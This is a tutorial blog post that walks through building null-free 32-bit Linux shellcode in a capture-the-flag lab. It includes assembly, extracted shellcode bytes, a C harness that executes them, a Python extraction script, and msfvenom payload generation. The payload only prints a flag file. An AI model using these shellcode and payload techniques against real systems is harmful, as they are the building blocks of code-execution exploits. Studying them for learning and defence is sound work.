Crafting your own shellcode requires getting muddy with low-level programming. One does not simply write machine code from memory. This blog post is my attempt at providing a template and tutorial of the shellcode creation process for a 32-bit Linux machine.
The first step is to write the task we want our shellcode to perform in a high-level language:
#include <unistd.h>

int main(void)
{
    char *egg[3];

    egg[0] = "/bin/cat";
    egg[1] = "flag.txt";
    egg[2] = NULL;
    execve(egg[0], egg, NULL);
}
Then statically compile the source and check to make sure it works as expected.
Note: There is already a file called flag.txt in the ‘ctf’ directory.
root@lab(~/ctf):# gcc -static -o getflag getflag.c
root@lab(~/ctf):# ./getflag
Flag{check_the_bytes}
Now we need to disassemble the execve(2) function and gather information about how it works at the assembly level.
root@lab(~/ctf):# gdb -q getflag
gef➤ disas execve
Dump of assembler code for function execve:
   0x0806d8a0 <+0>:  push ebx
   0x0806d8a1 <+1>:  mov edx,DWORD PTR [esp+0x10]
   0x0806d8a5 <+5>:  mov ecx,DWORD PTR [esp+0xc]
   0x0806d8a9 <+9>:  mov ebx,DWORD PTR [esp+0x8]
   0x0806d8ad <+13>: mov eax,0xb
   0x0806d8b2 <+18>: call DWORD PTR ds:0x80ec9f0
   0x0806d8b8 <+24>: pop ebx
   0x0806d8b9 <+25>: cmp eax,0xfffff001
   0x0806d8be <+30>: jae 0x80715c0 <__syscall_error>
   0x0806d8c4 <+36>: ret
End of assembler dump.
From the disassembly dump we can identify the registers that carry the arguments as well as the system call number (0xb, loaded into eax). We know this is the system call number because of the Linux system call convention on 32-bit x86: the call number goes in eax and the first three arguments go in ebx, ecx, and edx. The Intel Architecture Software Developer Manuals describe the registers and instructions themselves, but this convention is defined by the kernel. The system call numbers are listed in the following files of the kernel source tree, which is commonly found under /usr/src/linux when the sources are installed:
/usr/src/linux/arch/x86/entry/syscalls/syscall_32.tbl
/usr/src/linux/arch/x86/entry/syscalls/syscall_64.tbl
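As a rough illustration of how such a table maps names to numbers, here is a minimal Python sketch. The lines in `SAMPLE_TABLE` are an assumption: they are typed in the column layout used by syscall_32.tbl (number, ABI, name, entry point) and are not copied from a specific kernel tree. `load_syscalls` is a hypothetical helper name.

```python
# Illustrative excerpt in the syscall_32.tbl column layout:
#   <number> <abi> <name> <entry point>
# These sample lines are an assumption, not a copy of any kernel version.
SAMPLE_TABLE = """\
# comment lines start with '#'
1\ti386\texit\tsys_exit
11\ti386\texecve\tsys_execve
"""


def load_syscalls(text):
    """Map syscall names to numbers from table text (hypothetical helper)."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comments
        fields = line.split()
        table[fields[2]] = int(fields[0])
    return table


syscalls = load_syscalls(SAMPLE_TABLE)
print(hex(syscalls["execve"]))  # the value gdb showed being moved into eax
```

To run it against a real tree, the text could be read from the syscall_32.tbl path listed above, assuming the kernel sources are installed.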
With all of this information we can postulate that the execve(2) system call resembles the following:
execve(%ebx, %ecx, %edx)
I’m using GDB with GEF, but bare-bones GDB will also work. We need to check the values of each register to confirm our assumptions.
gef➤ b *0x0806d8b2
Breakpoint 1 at 0x806d8b2
gef➤ r
Breakpoint 1, 0x0806d8b2 in execve ()
gef➤ x/s $ebx
0x80bdd48: "/bin/cat"
gef➤ x/wx $ecx
0xbffff614: 0x080bdd48
gef➤ x/2s 0x080bdd48
0x80bdd48: "/bin/cat"
0x80bdd51: "flag.txt"
gef➤ p $edx
$1 = 0x0
gef➤ x/17b 0x080bdd48
0x80bdd48: 0x2f 0x62 0x69 0x6e 0x2f 0x63 0x61 0x74
0x80bdd50: 0x00 0x66 0x6c 0x61 0x67 0x2e 0x74 0x78
0x80bdd58: 0x74
First we set a breakpoint after all the registers in question have been populated and then run the program so we can look at the values. Refer to the GDB documentation if you are not familiar with how to examine memory locations and registers. Next we need to craft our assembly code with the caveat that we have to avoid bad characters. More on that later.
section .txt
global _start

_start:
    xor  eax, eax        ; eax == 0
    push eax             ; NUL-terminate the "/bin/cat" string
    push 0x7461632f      ; Push "/cat" string on the stack
    push 0x6e69622f      ; Push "/bin" string on the stack
    mov  ebx, esp        ; ebx pointer to "/bin/cat" (NUL-terminated)
    push eax             ; NUL-terminate the "flag.txt" string
    push 0x7478742e      ; Push ".txt" string on the stack
    push 0x67616c66      ; Push "flag" string on the stack
    mov  esi, esp        ; esi pointer to "flag.txt" (NUL-terminated)
    push eax             ; Place NULL on the stack
    push esi             ; Place pointer to "flag.txt"
    push ebx             ; Place pointer to "/bin/cat"
    mov  ecx, esp        ; ecx pointer to ["/bin/cat","flag.txt",NULL]
    xor  edx, edx        ; edx == NULL
    mov  al, 0xb         ; Store execve syscall number in al
    int  0x80            ; Do magik.
The code above is 32-bit assembly for Linux-based systems. The software interrupt (int 0x80) is the giveaway: it is the legacy 32-bit system call gate, whereas native 64-bit code uses the syscall instruction. Depending on your experience with assembly, the comments may or may not be enough to follow each line, so I will elaborate briefly.
Executable programs are divided into sections (.text, .bss, .data, etc.) that vary based on the specification for the file format, which in our case is the Executable and Linkable Format (ELF). On the Windows platform it is typically the Portable Executable (PE) format. The .text section is where program code is conventionally stored; the listing above names its section .txt, which the assembler accepts as a user-defined section name, and this post keeps that name so it matches the tool output shown. The .bss section contains uninitialized variables, and the .data section is a read/write section for initialized variables that do not have local scope.
The Netwide Assembler (NASM) uses the directive global in order to export symbols for use during object code linking. The _start label identifies to the GNU Linker (/usr/bin/ld) where code execution begins. We could have used _main or wrench as labels, but then you would have to specify the label to the linker using the ‘-e’ switch.
root@lab(~/ctf):# ld -e wrench -o getflag getflag.o
root@lab(~/ctf):# objdump -D getflag
Disassembly of section .txt:
08048054 <wrench>:
 8048054: 31 c0           xor %eax,%eax
 8048056: 50              push %eax
 8048057: 68 2f 63 61 74  push $0x7461632f
The _start label is the default that ld(1) expects as the entry point for your code.
Moving down to the instructions it should be noted that NASM uses the Intel syntax as opposed to the AT&T syntax. The most notable difference between the two is the ordering of the source and destination operands. The format can be changed by passing the ‘-M’ switch to objdump or setting the ‘disassembly-flavor’ in gdb if you don’t like the default.
Strings are pushed onto the stack four bytes at a time, last chunk first, with each chunk written as a little-endian immediate, and they have to be NUL-terminated. We capture the memory location of each string by copying the stack pointer (esp) right after pushing it. The wonderful thing about this technique is that we do not have to rely on a static memory location. From the disassembly of our C program we saw that execve used the ebx, ecx, and edx registers. We also used the esi register above to hold the address of “flag.txt” on the stack. Pushing NULL, esi, and ebx then builds the argument array on the stack, so esp holds a pointer to an array of pointers, which we copy into ecx. Which registers are safe to modify across a function call is defined by the platform's calling convention (the System V ABI for i386 on Linux) rather than by the Intel manuals. Therefore, in ordinary code we cannot arbitrarily use any random register and expect consistent results.
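The push ordering described above can be checked with a short Python sketch. `push_immediates` is a hypothetical helper name, and the sketch assumes the string length is a multiple of four, which holds for both strings in this post.

```python
import struct


def push_immediates(s):
    """Return the 32-bit immediates for string s, in the order to push them."""
    data = s.encode("ascii")
    if len(data) % 4 != 0:
        raise ValueError("this simple sketch needs a length that is a multiple of 4")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downward, so the last chunk is pushed first and the
    # string reads forward in memory once all chunks are on the stack.
    # "<I" interprets each 4-byte chunk as a little-endian 32-bit integer.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


for text in ("/bin/cat", "flag.txt"):
    print(text, [hex(value) for value in push_immediates(text)])
```

The values printed should match the immediates in the assembly listing. A string whose length is not a multiple of four needs extra handling (for example padding a path with additional slashes), which this sketch deliberately leaves out.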
Using xor to zero out a register, and then pushing that register, instead of pushing a literal ‘0x0’ avoids one of the most common bad characters that hinders shellcode. Another technique used in the code above to avoid ‘0x0’ bytes is to write only to the least significant byte (8 bits) of EAX. The general purpose registers EAX, EBX, ECX, and EDX each have a 16-bit name as well as names for the high and low 8 bits of that 16-bit half. For the EAX register they are AX, AH, and AL respectively. We use AL instead of EAX because a 32-bit immediate is padded with zero bytes in the encoding, and that is not what we want. This works only because EAX was already zeroed by the xor at the top, so its upper 24 bits are still clear. Compare the encoding when the full register is used:
8048077: b8 0b 00 00 00 mov eax,0xb
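To make the difference concrete, this small Python sketch counts NUL bytes in the two encodings. The byte values are taken from the objdump listings in this post; `nul_count` is a hypothetical helper name.

```python
# Encodings as shown by objdump in this post.
MOV_EAX_0XB = bytes.fromhex("b8 0b 00 00 00")  # mov eax, 0xb
MOV_AL_0XB = bytes.fromhex("b0 0b")            # mov al, 0xb


def nul_count(code):
    """Count the NUL bytes in a sequence of machine code bytes."""
    return code.count(b"\x00")


print("mov eax, 0xb:", len(MOV_EAX_0XB), "bytes,", nul_count(MOV_EAX_0XB), "NUL")
print("mov al, 0xb: ", len(MOV_AL_0XB), "bytes,", nul_count(MOV_AL_0XB), "NUL")
```

The 8-bit form is both shorter and free of NUL bytes, which is why the listing uses it.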
To assemble and link the assembly listing, use nasm and ld:
root@lab(~/ctf):# nasm -f elf getflag.asm
root@lab(~/ctf):# ld -o getflag getflag.o
root@lab(~/ctf):# ./getflag
If all of this seems daunting, I would recommend reading “The Art of Assembly Language” by Randall Hyde or “Assembly Language Step-by-Step” by Jeff Duntemann. Having a copy of the “Intel Architecture Software Developer Manuals” on your bookshelf or PDF reader is also a tremendous help, and they are free. I had the hardbacks shipped several years ago.
Moving on we now need to get the hex values for the opcodes in our program. We can use GDB or objdump:
root@lab(~/ctf):# objdump -D -M intel getflag
getflag: file format elf32-i386
Disassembly of section .txt:
08048054 <_start>:
 8048054: 31 c0           xor eax,eax
 8048056: 50              push eax
 8048057: 68 2f 63 61 74  push 0x7461632f
 804805c: 68 2f 62 69 6e  push 0x6e69622f
 8048061: 89 e3           mov ebx,esp
 8048063: 50              push eax
 8048064: 68 2e 74 78 74  push 0x7478742e
 8048069: 68 66 6c 61 67  push 0x67616c66
 804806e: 89 e6           mov esi,esp
 8048070: 50              push eax
 8048071: 56              push esi
 8048072: 53              push ebx
 8048073: 89 e1           mov ecx,esp
 8048075: 31 d2           xor edx,edx
 8048077: b0 0b           mov al,0xb
 8048079: cd 80           int 0x80
If you look at the middle column, the two-digit hex numbers are what we need; they are the machine code bytes that encode the mnemonic and operands shown in the last two columns. Normally, you would copy each byte by hand and prefix it with ‘\x’, for example:
\x31\xc0\x50\x68\x2f\x63
We can automate this process in a number of ways, but let's use Python:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2018 Michael Edie / @tankmek

import re
import sys

# A token counts as a byte only if it is exactly two lowercase hex digits.
opcode = re.compile(r"^[0-9a-f]{2}$")


def format_opcodes(hexchars):
    """Prefix each two-digit hex string with a backslash-x escape."""
    return "".join("\\x" + x for x in hexchars)


def main():
    hexlist = []
    # Read objdump output from stdin and keep only the byte tokens.
    for line in sys.stdin:
        for n in line.split():
            if opcode.match(n):
                hexlist.append(n)
    print("Shellcode: %d bytes" % len(hexlist))
    print(format_opcodes(hexlist))


if __name__ == '__main__':
    main()
The script above takes standard input from objdump and outputs the shellcode with the size in bytes.
root@lab(~/ctf):# objdump -D getflag | ./obj2shell.py
Shellcode: 39 bytes
\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78\x74\x68\x66\x6c\x61\x67\x89\xe6\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
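Matching any two-digit hex token can misfire if a mnemonic or operand happens to look like a byte. A possible alternative, sketched below, relies on objdump separating the address, byte, and instruction columns with tabs and reads only the byte column. `bytes_from_objdump` is a hypothetical helper name, and `SAMPLE` is a hand-typed excerpt modelled on the AT&T-syntax listing earlier in this post.

```python
# Hand-typed sample in objdump's tab-separated layout:
#   "<addr>:\t<hex bytes>\t<mnemonic and operands>"
SAMPLE = (
    "08048054 <_start>:\n"
    " 8048054:\t31 c0                \txor    %eax,%eax\n"
    " 8048056:\t50                   \tpush   %eax\n"
    " 8048057:\t68 2f 63 61 74       \tpush   $0x7461632f\n"
)


def bytes_from_objdump(text):
    """Collect machine code bytes from the byte column of objdump output."""
    out = bytearray()
    for line in text.splitlines():
        parts = line.split("\t")
        # Skip headers and labels: instruction lines have at least two
        # tab-separated fields and the first one ends with a colon.
        if len(parts) < 2 or not parts[0].strip().endswith(":"):
            continue
        hex_digits = "".join(parts[1].split())  # drop the padding spaces
        try:
            out += bytes.fromhex(hex_digits)
        except ValueError:
            continue  # not a byte column after all
    return bytes(out)


code = bytes_from_objdump(SAMPLE)
print("Shellcode: %d bytes" % len(code))
print("".join("\\x%02x" % b for b in code))
```

Returning a `bytes` object rather than a list of strings also makes later checks, such as looking for NUL bytes, a one-liner.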
You can take the shellcode and test it with the following code:
#include <stdio.h>

char egg[] =
    "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78"
    "\x74\x68\x66\x6c\x61\x67\x89\xe6\x50\x56"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
    /* Treat the byte array as a function and call it. */
    int (*payload)(void) = (int (*)(void)) egg;

    return payload();
}
Then compile and execute:
root@lab(~/ctf):# make test_shellcode
cc test_shellcode.c -o test_shellcode
root@lab(~/ctf):# ./test_shellcode
Flag{check_the_bytes}
Voila! We are done. Just for fun here is a bash one-liner that does the same thing.
for i in $(objdump -D getflag | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ) ; do echo -n "\x$i"; done
Other options to speed up the process include modifying publicly available shellcode or using msfvenom to create what you need.
root@lab(~/ctf):# msfvenom -f c -p linux/x86/exec -a x86 --platform linux CMD='/bin/cat flag.txt'
No encoder or badchars specified, outputting raw payload
Payload size: 53 bytes
Final size of c file: 248 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12\x00\x00\x00\x2f"
"\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x74\x78"
"\x74\x00\x57\x53\x89\xe1\xcd\x80";
But notice that the default output includes \x00 bytes, which will truncate the payload if it passes through C string handling such as strcpy. This is what is known as a bad character (badchar). NUL is not the only one, and which bytes are bad depends on how the target processes its input, so you will have to do bad character analysis to figure out which ones to avoid; otherwise your payload will be cut short or altered before it runs.
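A first pass at that analysis can be scripted. The sketch below scans both payloads from this post for bad characters. `find_badchars` is a hypothetical helper name, and the default set of only NUL is an assumption; extend it with whatever bytes your target mangles.

```python
# The hand-written shellcode from this post (39 bytes).
HANDWRITTEN = bytes.fromhex(
    "31 c0 50 68 2f 63 61 74 68 2f 62 69 6e 89 e3 50 68 2e 74 78 74 "
    "68 66 6c 61 67 89 e6 50 56 53 89 e1 31 d2 b0 0b cd 80"
)

# The msfvenom payload shown above (53 bytes).
MSFVENOM = bytes.fromhex(
    "6a 0b 58 99 52 66 68 2d 63 89 e7 68 2f 73 68 "
    "00 68 2f 62 69 6e 89 e3 52 e8 12 00 00 00 2f "
    "62 69 6e 2f 63 61 74 20 66 6c 61 67 2e 74 78 "
    "74 00 57 53 89 e1 cd 80"
)


def find_badchars(code, badchars=b"\x00"):
    """Return (offset, byte) pairs for every bad character found in code."""
    return [(i, b) for i, b in enumerate(code) if b in badchars]


for name, code in (("handwritten", HANDWRITTEN), ("msfvenom", MSFVENOM)):
    hits = find_badchars(code)
    print("%s: %d bytes, bad offsets: %s" % (name, len(code), [i for i, _ in hits]))
```

Passing a larger set, for example `find_badchars(code, b"\x00\x0a\x0d")`, checks for newline and carriage return as well, which some input handlers also treat specially.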
Thanks for reading.